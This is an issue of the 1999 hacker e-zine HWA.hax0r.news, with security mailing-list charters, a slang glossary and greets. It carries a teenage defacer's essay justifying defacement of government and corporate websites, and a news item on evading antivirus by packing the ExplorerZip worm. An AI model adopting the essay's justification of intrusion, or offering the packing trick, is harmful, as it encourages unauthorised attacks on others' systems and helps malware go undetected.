    Please refrain from posting one-line messages or messages that do not contain
    any substance that can relate to this list`s charter.

    I will allow certain informational posts regarding updates to security tools,
    documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
    on this list.

    Please follow the below guidelines on what kind of information should be posted
    to the Bugtraq list:

    + Information on Unix related security holes/backdoors (past and present)
    + Exploit programs, scripts or detailed processes about the above
    + Patches, workarounds, fixes
    + Announcements, advisories or warnings
    + Ideas, future plans or current works dealing with Unix security
    + Information material regarding vendor contacts and procedures
    + Individual experiences in dealing with above vendors or security organizations
    + Incident advisories or informational reporting

    Any non-essential replies should not be directed to the list but to the originator of the message. Please do not
    "CC" the bugtraq reflector address if the response does not meet the above criteria.

    Remember: YOYOW.

    You own your own words. This means that you are responsible for the words that you post on this list and that
    reproduction of those words without your permission in any medium outside the distribution of this list may be
     challenged by you, the author.

    For questions or comments, please mail me:
    chasin@crimelab.com (Scott Chasin)
    
    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    

      I am pleased to inform you of several changes that will be occurring
      on June 5th. I hope you find them as exciting as I do.
      
      
      BUGTRAQ moves to a new home
      ---------------------------
      
      
      First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
      to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
      below. Other than the change of domains nothing of how the list
      is run changes. I am still the moderator. We play by the same rules.
      
      
      Security Focus will be providing mail archives for BUGTRAQ. The
      archives go back longer than Netspace's and are more complete than
      Geek-Girl's.
      
      
      The move will occur one week from today. You will not need to
      resubscribe. All your information, including subscription options
      will be moved transparently.
      
      
      Any of you using mail filters (e.g. procmail) to sort incoming
      mail into mail folders by examining the From address will have to
      update them to include the new address. The new address will be:
      
      
                            BUGTRAQ@SECURITYFOCUS.COM
      
      
      Security Focus also be providing a free searchable vulnerability
      database.
      
      
      BUGTRAQ es muy bueno
      --------------------
      
      
      It has also become apparent that there is a need for forums
      in the spirit of BUGTRAQ where non-English speaking people
      or people that don't feel comfortable speaking English can
      exchange information.
      
      
      As such I've decided to give BUGTRAQ in other languages a try.
      BUGTRAQ will continue to be the place to submit vulnerability
      information, but if you feel more comfortable using some other
      language you can give the other lists a try. All relevant information
      from the other lists which have not already been covered here
      will be translated and forwarded on by the list moderator.
      
      
      In the next couple of weeks we will be introducing BUGTRAQ-JP
      (Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
      and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
      from Argentina <http://www.core-sdi.com/> (the folks that brought you
      Secure Syslog and the SSH insertion attack).
      
      
      What is Security Focus?
      -----------------------
      
      
      Security Focus is an exercise in creating a community and a security
      resource. We hope to be able to provide a medium where useful and
      successful resources such as BUGTRAQ can occur, while at the same
      time providing a comprehensive source of security information. Aside
      from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
      herself!) have moved over to Security Focus to help us with building
      this new community. The other staff at Security Focus are largely derived
      from long time supporters of Bugtraq and the community in general. If
      you are interested in viewing the staff pages, please see the 'About'
      section on www.securityfocus.com.
      
      
      On the community creating front you will find a set of forums
      and mailing lists we hope you will find useful. A number of them
      are not scheduled to start for several weeks but starting today
      the following list is available:
      
      
      * Incidents' Mailing List. BUGTRAQ has always been about the
         discussion of new vulnerabilities. As such I normally don't approve
         messages about break-ins, trojans, viruses, etc with the exception
         of wide spread cases (Melissa, ADM worm, etc). The other choice
         people are usually left with is email CERT but this fails to
         communicate this important information to other that may be
         potentially affected.
      
      
         The Incidents mailing list is a lightly moderated mailing list to
         facilitate the quick exchange of security incident information.
         Topical items include such things as information about rootkits
         new trojan horses and viruses, source of attacks and tell-tale
         signs of intrusions.
      
      
         To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
         of:
      
      
                   SUBS INCIDENTS FirstName, LastName
      
      
      Shortly we'll also be introducing an Information Warfare forum along
      with ten other forums over the next two months. These forums will be
      built and moderated by people in the community as well as vendors who
      are willing to take part in the community building process.
      *Note to the vendors here* We have several security vendors who have
      agreed to run forums where they can participate in the online communities.
      If you would like to take part as well, mail Alfred Huger,
      ahuger@securityfocus.com.
      
      
      On the information resource front you find a large database of
      the following:
      
      
      * Vulnerabilities. We are making accessible a free vulnerability
         database. You can search it by vendor, product and keyword. You
         will find detailed information on the vulnerability and how to fix it,
         as well are links to reference information such as email messages,
         advisories and web pages. You can search by vendor, product and
         keywords. The database itself is the result of culling through 5
         years of BUGTRAQ plus countless other lists and news groups. It's
         a shining example of how thorough full disclosure has made a significant
         impact on the industry over the last half decade.
      
      
      * Products. An incredible number of categorized security products
         from over two hundred different vendors.
      
      
      * Services. A large and focused directory of security services offered by
         vendors.
      
      
      * Books, Papers and Articles. A vast number of categorized security
         related books, papers and articles. Available to download directly
         for our servers when possible.
      
      
      * Tools. A large array of free security tools. Categorized and
         available for download.
      
      
      * News: A vast number of security news articles going all the way
         back to 1995.
      
      
      * Security Resources: A directory to other security resources on
         the net.
      
      
      As well as many other things such as an event calendar.
      
      
      For your convenience the home-page can be personalized to display
      only information you may be interested in. You can filter by
      categories, keywords and operating systems, as well as configure
      how much data to display.
      
      
      I'd like to thank the fine folks at NETSPACE for hosting the
      site for as long as they have. Their services have been invaluable.
      
      
      I hope you find these changes for the best and the new services
      useful. I invite you to visit http://www.securityfocus.com/ and
      check it out for yourself. If you have any comments or suggestions
      please feel free to contact me at this address or at
      aleph1@securityfocus.com.
      
      
      Cheers.
      
      
      --
      Aleph One / aleph1@underground.org
      http://underground.org/
      KeyID 1024/948FD6B5
      Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01
      



    
    Crypto-Gram
    ~~~~~~~~~~~

       CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on cryptography and computer security.

      To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
      blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe,
      visit http://www.counterpane.com/unsubform.html.� Back issues are available
      on http://www.counterpane.com.

       CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of
      Counterpane Systems, the author of "Applied Cryptography," and an inventor
      of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of
      the International Association for Cryptologic Research, EPIC, and VTW.� He
      is a frequent writer and lecturer on cryptography.


    CUD Computer Underground Digest
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    This info directly from their latest ish:

    Computer underground Digest��� Sun� 14 Feb, 1999�� Volume 11 : Issue 09
�����
��������������������� ISSN� 1004-042X

������ Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
������ News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
������ Archivist: Brendan Kehoe
������ Poof Reader:�� Etaion Shrdlu, Jr.
������ Shadow-Archivists: Dan Carosone / Paul Southworth
������������������������� Ralph Sims / Jyrki Kuoppala
������������������������� Ian Dickinson
������ Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



    [ISN] Security list
    ~~~~~~~~~~~~~~~~~~~
    This is a low volume list with lots of informative articles, if I had my
    way i'd reproduce them ALL here, well almost all .... ;-) - Ed

    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
      
      --[ New ISN announcement (New!!)
      
      
      Sender:       ISN Mailing List <ISN@SECURITYFOCUS.COM>
      From:         mea culpa <jericho@DIMENSIONAL.COM>
      Subject:      Where has ISN been?
      Comments: To: InfoSec News <isn@securityfocus.com>
      To:           ISN@SECURITYFOCUS.COM
      
      
      It all starts long ago, on a network far away..
      
      
      Not really. Several months ago the system that hosted the ISN mail list
      was taken offline. Before that occured, I was not able to retrieve the
      subscriber list. Because of that, the list has been down for a while. I
      opted to wait to get the list back rather than attempt to make everyone
      resubscribe.
      
      
      As you can see from the headers, ISN is now generously being hosted by
      Security Focus [www.securityfocus.com]. THey are providing the bandwidth,
      machine, and listserv that runs the list now.
      
      
      Hopefully, this message will find all ISN subscribers, help us weed out
      dead addresses, and assure you the list is still here. If you have found
      the list to be valuable in the past, please tell friends and associates
      about the list. To subscribe, mail listserv@securityfocus.com with
      "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
      
      
      As usual, comments and suggestions are welcome. I apologize for the down
      time of the list. Hopefully it won't happen again. ;)
      
      
      
      mea_culpa
      www.attrition.org
      
      
      
      --[ Old ISN welcome message
      
      
      [Last updated on: Mon Nov  04  0:11:23 1998]
      
      
      InfoSec News is a privately run, medium traffic list that caters 
      to distribution of information security news articles. These 
      articles will come from newspapers, magazines, online resources, 
      and more.
      
      
      The subject line will always contain the title of the article, so that
      you may quickly and effeciently filter past the articles of no interest.
      
      
      This list will contain:
      
      
      o       Articles catering to security, hacking, firewalls, new security
              encryption, products, public hacks, hoaxes, legislation affecting
              these topics and more.
      
      
      o       Information on where to obtain articles in current magazines.
      
      
      o       Security Book reviews and information.
      
      
      o       Security conference/seminar information.
      
      
      o       New security product information.
      
      
      o       And anything else that comes to mind..
      
      
      Feedback is encouraged. The list maintainers would like to hear what
      you think of the list, what could use improving, and which parts
      are "right on". Subscribers are also encouraged to submit articles
      or URLs. If you submit an article, please send either the URL or
      the article in ASCII text. Further, subscribers are encouraged to give
      feedback on articles or stories, which may be posted to the list.
      
      
      Please do NOT:
      
      
              * subscribe vanity mail forwards to this list
      
      
              * subscribe from 'free' mail addresses (ie: juno, hotmail)
      
      
              * enable vacation messages while subscribed to mail lists
      
      
              * subscribe from any account with a small quota
      
      
      All of these generate messages to the list owner and make tracking
      down dead accounts very difficult. I am currently receiving as many 
      as fifty returned mails a day. Any of the above are grounds for
      being unsubscribed. You are welcome to resubscribe when you address
      the issue(s).
      
      
      Special thanks to the following for continued contribution:
              William Knowles, Aleph One, Will Spencer, Jay Dyson,
              Nicholas Brawn, Felix von Leitner, Phreak Moi and 
              other contributers.
      
      
      ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
      ISN Archive: http://www.landfield.com/isn
      ISN Archive: http://www.jammed.com/Lists/ISN/
      
      
      ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
          private list. Moderation of topics, member subscription, and
          everything else about the list is solely at his discretion.
      
      
      The ISN membership list is NOT available for sale or disclosure.  
      
      
      ISN is a non-profit list. Sponsors are only donating to cover bandwidth 
          and server costs. 
          
          
     Win2k Security Advice Mailing List (new added Nov 30th)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     
      To subscribe:
      
      
      send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body
      to  listserv@listserv.ntsecurity.net
      
     
      
      Welcome to Win2K Security Advice! Thank you for subscribing. If you have any
      questions or comments about the list please feel free to contact the list
      moderator, Steve Manzuik, at steve@win2ksecadvice.net.
      
      To see what you've missed recently on the list, or to research an item
      of interest, be sure to visit the Web-based archives located at:
      http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec
      
      ==============
      NTSecurity.net brings the security community a brand new (Oct 99) and
      much-requested Windows security mailing list. This new moderated mailing list,
      Win2KSecAdvice (formerly NTSecAdvice,) is geared towards promoting the open
      discussion of Windows-related security issues.
      
      With a firm and unwavering commitment towards timely full disclosure, this
      new resource promises to become a great forum for open discussion
      regarding security-related bugs, vulnerabilities, potential exploits, virus,
      worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community
      and we openly invite all security minded individuals, be they white hat,
      gray hat, or black hat, to join the new mailing list.
      
      While Win2KSecAdvice was named in the spirit of Microsoft's impending product
      line name change, and meant to reflect the list's security focus both now and
      in the long run, it is by no means limited to security topics centered around
      Windows 2000. Any security issues that pertain to Windows-based networking are
      relevant for discussion, including all Windows operating systems, MS Office,
      MS BackOffice, and all related third party applications and hardware.
      
      The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to
      a security risk, it's relevant to the list.
      
      The list archives are available on the Web at http://www.ntsecurity.net,
      which include a List Charter and FAQ, as well as Web-based searchable list
      archives for your research endeavors.
      
      SAVE THIS INFO FOR YOUR REFERENCE:
      
      To post to the list simply send your email to
      win2ksecadvice@listserv.ntsecurity.net
      
      To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to
      listserv@listserv.ntsecurity.net
      
      Regards,
      
      Steve Manzuik, List Moderator
      Win2K Security Advice
      steve@win2ksecadvice.net     

    



    @HWA


 00.3 THIS IS WHO WE ARE
      ~~~~~~~~~~~~~~~~~~
      
            __        ___                                      ___
            \ \      / / |__   ___   __ _ _ __ _____      ____|__ \
             \ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ /
              \ V  V / | | | | (_) | (_| | | |  __/\ V  V /  __/_|
               \_/\_/  |_| |_|\___/ \__,_|_|  \___| \_/\_/ \___(_)

 
      Some HWA members and Legacy staff
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      cruciphux@dok.org.........: currently active/editorial
      darkshadez@ThePentagon.com: currently active/man in black
      fprophet@dok.org..........: currently active/programming/IRC+ man in black
      sas2@usa.net .............. currently active/IRC+ distribution
      vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
      dicentra...(email withheld): IRC+ grrl in black
      twisted-pair@home.com......: currently active/programming/IRC+


      Foreign Correspondants/affiliate members
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       Qubik ............................: United Kingdom 
       D----Y ...........................: USA/world media
       HWA members ......................: World Media
       
      
      
      Past Foreign Correspondants (currently inactive or presumed dead) 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Sla5h.............................: Croatia
       N0Portz ..........................: Australia           
       system error .....................: Indonesia           
       Wile (wile coyote) ...............: Japan/the East      
       Ruffneck  ........................: Netherlands/Holland 
       Wyze1.............................: South Africa

       
       Please send in your sites for inclusion here if you haven't already
       also if you want your emails listed send me a note ... - Ed

      Spikeman's site is down as of this writing, if it comes back online it will be
      posted here.
      
      http://www.hackerlink.or.id/  ............ System Error's site (in Indonesian) 
      
      Sla5h's email: smuddo@yahoo.com
       

       *******************************************************************
       ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
       *******************************************************************

    :-p


    1. We do NOT work for the government in any shape or form.Unless you count paying
       taxes ... in which case we work for the gov't in a BIG WAY. :-/

    2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
       events its a good idea to check out issue #1 at least and possibly also the
       Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


    @HWA



 00.4 Whats in a name? why HWA.hax0r.news??
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                             
      
      Well what does HWA stand for? never mind if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Pretorians after you.

     In case you couldn't figure it out hax0r is "new skewl" and although
     it is laughed at, shunned, or even pidgeon holed with those 'dumb
     leet (l33t?) dewds' <see article in issue #4> this is the state
     of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
     up  and comers, i'd highly recommend you get that book. Its almost
     like  buying a clue. Anyway..on with the show .. - Editorial staff


     @HWA

00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
                    _   ___        ___      _____ _    ___
                   | | | \ \      / / \    |  ___/ \  / _ \
                   | |_| |\ \ /\ / / _ \   | |_ / _ \| | | |
                   |  _  | \ V  V / ___ \ _|  _/ ___ \ |_| |
                   |_| |_|  \_/\_/_/   \_(_)_|/_/   \_\__\_\
                     

    Also released in issue #3. (revised) check that issue for the faq
    it won't be reprinted unless changed in a big way with the exception
    of the following excerpt from the FAQ, included to assist first time
    readers:

    Some of the stuff related to personal useage and use in this zine are
    listed below: Some are very useful, others attempt to deny the any possible
    attempts at eschewing obfuscation by obsucuring their actual definitions.

    @HWA   - see EoA  ;-)

    !=     - Mathematical notation "is not equal to" or "does not equal"
             ASC(247)  "wavey equals" sign means "almost equal" to. If written
             an =/= (equals sign with a slash thru it) also means !=, =< is Equal
             to or less than and =>  is equal to or greater than (etc, this aint
             fucking grade school, cripes, don't believe I just typed all that..)

    AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

    AOL    - A great deal of people that got ripped off for net access by a huge
             clueless isp with sekurity that you can drive buses through, we're
             not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
             least they could try leasing one??

   *CC     - 1 - Credit Card (as in phraud)
             2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's

    CCC    - Chaos Computer Club (Germany)

   *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
             ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
             watch videos and seminars, get drunk, listen to speakers, and last but
             not least, get drunk.
   *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
                 speak he's the guy that breaks into systems and is often (but by no
                 means always) a "script kiddie" see pheer
              2 . An edible biscuit usually crappy tasting without a nice dip, I like
                  jalapeno pepper dip or chives sour cream and onion, yum - Ed

    Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
              Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
              ebonics, speaking in a dark tongue ... being ereet, see pheer

    EoC    - End of Commentary

    EoA    - End of Article or more commonly @HWA

    EoF    - End of file

    EoD    - End of diatribe (AOL'ers: look it up)

    FUD    - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
            usually in general media articles not high brow articles such as ours or other
            HNN affiliates ;)

    du0d   - a small furry animal that scurries over keyboards causing people to type
             weird crap on irc, hence when someone says something stupid or off topic
             'du0d wtf are you talkin about' may be used.

   *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

   *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
            define, I think it is best defined as pop culture's view on The Hacker ala
            movies such as well erhm "Hackers" and The Net etc... usually used by "real"
            hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
            some coffee?' or can you hax0r some bread on the way to the table please?'

            2 - A tool for cutting sheet metal.

    HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
             time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
             noun means the hackernews site proper. k? k. ;&

    HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

    J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

    MFI/MOI- Missing on/from IRC

    NFC   - Depends on context: No Further Comment or No Fucking Comment

    NFR   - Network Flight Recorder (Do a websearch) see 0wn3d

    NFW   - No fuckin'way

   *0WN3D - You are cracked and owned by an elite entity see pheer
   *OFCS  - Oh for christ's sakes

    PHACV - And variations of same <coff>
            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking <software>
                      C - Cracking <systems hacking>
                      V - Virus
                      W - Warfare <cyberwarfare usually as in Jihad>
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

   *PHEER -  This is what you do when an ereet or elite person is in your presence
            see 0wn3d

   *RTFM  - Read the fucking manual - not always applicable since some manuals are
            pure shit but if the answer you seek is indeed in the manual then you
            should have RTFM you dumb ass.

    TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0

    TBA   - To Be Arranged/To Be Announced also 2ba

    TFS   - Tough fucking shit.

   *w00t  - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
            from the underground masses. also "w00ten" <sic>

            2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

    *wtf  - what the fuck, where the fuck, when the fuck etc ..

    *ZEN  - The state you reach when you *think* you know everything (but really don't)
            usually shortly after reaching the ZEN like state something will break that
            you just 'fixed' or tweaked.
            
     @HWA            
     
     
                            -=-    :.    .:        -=-
                            
                            
                            

 01.0 Greets!?!?! yeah greets! w0w huh. - Ed
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                           ____               _
                          / ___|_ __ ___  ___| |_ ___
                         | |  _| '__/ _ \/ _ \ __/ __|
                         | |_| | | |  __/  __/ |_\__ \
                          \____|_|  \___|\___|\__|___/


     Thanks to all in the community for their support and interest but i'd
     like to see more reader input, help me out here, whats good, what sucks
     etc, not that I guarantee i'll take any notice mind you, but send in
     your thoughts anyway.


       * all the people who sent in cool emails and support
       
     FProphet       Pyra                TwstdPair      _NeM_
     D----Y         Dicentra            vexxation      sAs72
     Spikeman       p0lix               Vortexia      Wyze1
     Pneuma         Raven               Zym0t1c       duro
     Repluzer       astral              BHZ           ScrewUp
     Qubik          gov-boi             _Jeezus_      Haze_
     thedeuce       ytcracker
     
     Folks from #hwa.hax0r,news and #fawkerz, #ninjachat and #sesame 
     
     
               
     Ken Williams/tattooman ex-of PacketStorm,
          
     & Kevin Mitnick                      
     
     kewl sites:
     
     + http://www.hack.co.za  NEW
     + http://blacksun.box.sk. NEW
     + http://packetstorm.securify.com/ NEW
     + http://www.securityportal.com/ NEW
     + http://www.securityfocus.com/ NEW
     + http://www.hackcanada.com/
     + http://www.l0pht.com/
     + http://www.2600.com/
     + http://www.freekevin.com/
     + http://www.genocide2600.com/
     + http://www.hackernews.com/ (Went online same time we started issue 1!)
     + http://www.net-security.org/
     + http://www.slashdot.org/
     + http://www.freshmeat.net/
     + http://www.403-security.org/
     + http://ech0.cjb.net/

     @HWA


 01.1 Last minute stuff, rumours and newsbytes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       "What is popular isn't always right, and what is right isn't
         always popular..."
                           - FProphet '99
                           
       

    +++ When was the last time you backed up your important data?
    
     
 
          
     
      Thanks to myself for providing the info from my wired news feed and others from whatever
      sources, also to Spikeman for sending in past entries.... - Ed
      
     @HWA

 01.2 MAILBAG - email and posts from the message board worthy of a read
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
              
      Yeah we have a message board, feel free to use it, remember there are no stupid questions...
      well there are but if you ask something really dumb we'll just laugh at ya, lets give the
      message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org
      domain comes back online (soon) meanwhile the beseen board is still up...
        
      
    
      ==============================================================================
      
      
      
      
      

      

 02.0 From the editor.
      ~~~~~~~~~~~~~~~~

     #include <stdio.h>
     #include <thoughts.h>
     #include <backup.h>

     main()
         {
           printf ("Read commented source!\n\n");

     /*
          * Short issue this week, i'm still sick <feh>
          * so haven't put as much time as I usually do
          * into digging up info and etc, hopefully be
          * back to normal next week...
          * 
          */
           
     printf ("EoF.\n");
           }

      

      Congrats, thanks, articles, news submissions and kudos to us at the
         
      main address: hwa@press.usmc.net complaints and all nastygrams and
         
      mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
         
      127.0.0.1, private mail to cruciphux@dok.org

     danke.

     C*:.
     
     -= start =--= start =--= start =--= start =--= start =--= start =--= start 
   
     
                       ____            _             _
                      / ___|___  _ __ | |_ ___ _ __ | |_
                     | |   / _ \| '_ \| __/ _ \ '_ \| __|
                     | |__| (_) | | | | ||  __/ | | | |_
                      \____\___/|_| |_|\__\___|_| |_|\__|
                           / ___|| |_ __ _ _ __| |_
                           \___ \| __/ _` | '__| __|
                            ___) | || (_| | |  | |_
                           |____/ \__\__,_|_|   \__|

             
     
                            
      -= start =--= start =--= start =--= start =--= start =--= start =--= 
                         
     
     
     
     
03.0  Yes It Is (Worth It) 
      ~~~~~~~~~~~~~~~~~~~~

      contributed by ytcracker 
      Active web page defacer YTCracker has written an
      article in response to Brian Martin's article Is It Worth
      IT, published by HNN last week. Mr Martin asked if the
      recent spate of web page defacements was worth the
      trouble it causes the perpetrators. YTCracker has
      recently defaced such high profile pages as Bureau of
      Land Management National Training Center and the
      Defense Contracts Audit Agency. YTCracker now
      explains the motivation and says that, Yes, it is worth
      it. 

      Buffer Overflow
      http://www.hackernews.com/orig/buffero.html
      
      HNN Cracked Pages Archive - Some of YTCrackers work is displayed here. 
      http://www.hackernews.com/archive/crackarch.html
      
      
      "Yes, it is."


      A response to Brian Martin's Is it worth it? article. 

      By YTCracker (phed@felons.org) 



      This article was written in response to an article written
      by Brian Martin concerning web page defacement, its
      risks, and its consequences. He asks the eternal question
      "Is it worth it?" to those who participate in these kinds of
      activities. Many of the individuals I have talked to have
      mixed thoughts about the article. Some individuals say it
      really taught them something valuable. Some said it
      scared them into considering quitting. Others, including
      myself, carry a somewhat apathetic attitude toward the
      whole thing in general. Allow me to explain.

      A few things need to be established about this
      defacement culture. One, I believe that this in no way
      constitutes as hacking. On any level, no matter how you
      look at it, web page defacement is destructive. In some
      cases, it can ruin the credibility of a company or a
      government agency. Two, I believe that web page
      defacement should carry a "message". When I spoke with
      Brian earlier, I tried to make it clear that we [as third
      person onlookers to a defacement] cannot determine this
      message in some cases. To us, "hack0r x 0ens u in 9d9"
      probably means nothing at all. To hack0r x, it may have.
      However, I personally believe that if hack0r x is going to
      break into this page and disrupt their message, his better
      be worthwhile. Thirdly, I believe that there is a "whiter"
      side to defacement. This side operates within definitive
      ethical boundaries and attempts to make web page
      cracking as non-malicious as possible.

      I do my best to have the ability to define myself under
      this ethical side. I back everything up. I leave the
      administrator information on how to fix the security hole. I
      don't disrupt the flow of information - I leave a link to the
      original page in plain sight. While these factors don't
      guarantee my immunity, they surely aren't raising any
      eyebrows and leading people to contemplate my threat to
      national security. I am not concerned with leaving
      messages like "fuq da fedz in 9d9 suk0r my nutsaq." That,
      frankly, is asking for trouble. It also serves no purpose.

      Why do I do it? There are a few key reasons. I am sure
      that everyone out there that contributes to this scene
      has their own.

      First off, I am seventeen [before I go any further, I am
      referring to seventeen as "kid", not "a minor and therefore
      will receive lesser penalty"]. As a young member of
      society oftentimes I find that my voice goes unheard. In a
      book titled Rise and Fall of the American Teen by Thomas
      Hine [NPR broadcast] , the theory is presented that the
      proverbial "teenager" did not exist until the 1930s. Until
      that time, teenagers were too busy supporting the family,
      getting married, and having children. Nowadays, if I were
      to write my senator, correct my teacher, or start a
      business, people automatically assume that I am
      incapable. This is a stereotype that I have not established
      for myself; other teenagers have given me a reputation
      unbefitting of who I really am. By defacing a website,
      people have to listen. The volume of people that visit the
      site as it is defaced combined with the volume of people
      that view it mirrored is immense. Therefore, I have
      effectively gotten my message out, and people can
      choose to listen to it or not.

      If this sounds extremely selfish, I agree. The twist comes
      in the questions that people ask themselves. For instance,
      one of my motivations is enlightening system
      administrators. There has been many a case where I have
      noticed a vulnerablilty, mailed the admin, and his/her
      cockyness resulted in ignoring my warning. Two or three
      days later, I see this admin's page on the mirror.
      Sometimes, the best way to inform someone is to show
      them. Seeing is believing. The point is, if I can get at
      least one of the hundred people that see that site,
      including the administrator, to realize that security isn't all
      its cracked up to be and change their views, I have done
      my job. This line of thought is very common in the heads
      of most defacement practitioners.

      Second, I am a graffiti artist. I throw burners on walls and
      trains. I have ran with some infamous crews. I do not
      represent the "tagging" aspect [for the uninitiated, the
      equivalent of "b0n3r oenz u" on a defacement]. I strongly
      feel that graffiti can be very artistic and carry a very
      strong message if done correctly. People will pass by your
      piece and either love it or hate it. For that moment they
      take their mind off of their jobs, their children, their lives
      and they contemplate what they are looking at. This is
      very much so the purpose of web defacement in my eyes.

      Third, I don't care. I can't care. I haven't been raided,
      haven't stared down a lawman's gun, and haven't been
      investigated for computer crime. If any of these were to
      happen to me, I have no doubt in my mind I will see things
      in a different light. This ignorance is obviously not very
      healthy. I have weighed the consequences and see very
      little in favor of me stopping. I will most likely continue to
      deface until it gets old, I have nothing else to say, or
      simply don't have time. I would argue that ninety percent
      of web page defacements fall under this mindset. This is
      sad, but true. This is not to say that I or anyone else isn't
      aware of the rules. That assumption is far from the truth.
      What it means is that we are basically carefree in the
      sense that we could be arrested and still feel good about
      ourselves. ;)

      In a sense, it isn't worth it. There are only a few of us
      singlehandedly cracking with good intentions. The rest of
      the scene is too busy talking shit to each other or rm
      -rfing everything they can that there is a stereotype
      affiliated. As aforementioned, stereotypes are the ultimate
      backpedal to anything we accomplish. Just as teenagers
      are ignored and pigeonholed, everyone who totes a
      computer and investigates security will be labeled a
      threat.

      What does make it worth it? Arguably, the few who carry
      on the tradition. PHC and Narcissus - using their
      defacements as a political tool. DHC - putting an
      interesting poetic twist to their cracks. ULG - for making
      BIG statements on BIG sites. Last but not least, v00d00 -
      for his cynical views and unique style. There are others,
      no doubt, but these guys definately take the cake for
      originality and style - they have my respect.

      So next time you see my name or anyone else's pop up on
      attrition and wonder why we do it, think back to this
      article. Is it worth it?

      You decide.



      YTCracker(phed@felons.org)
      (c)1999 YTCracker andseven one nine



     @HWA
     
04.0  ExplorerZip Shrinks, Becomes MiniZip 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by Evil Wench 
      By applying a simple compression scheme (Neolite) to
      the well known destructive virus WormExplorer it is
      possible to sneak the old worm by antivirus software.
      This 'new' version of WormExplorer is being called
      MiniZip. The worm uses MAPI-capable e-mail programs
      to propagate, such as Microsoft Corp.'s Outlook,
      Microsoft Corp.'s Outlook Express and Microsoft Corp.'s
      Exchange. At least twenty companies and several
      thousand systems have been infected so far. (It is
      pretty sad that with todays technology a simple
      compression routine is enough to bypass antivirus
      technology. Pattern detection is not the answer. Sure
      hope the AV companies have something better up their
      sleeves.) 

      ZD Net
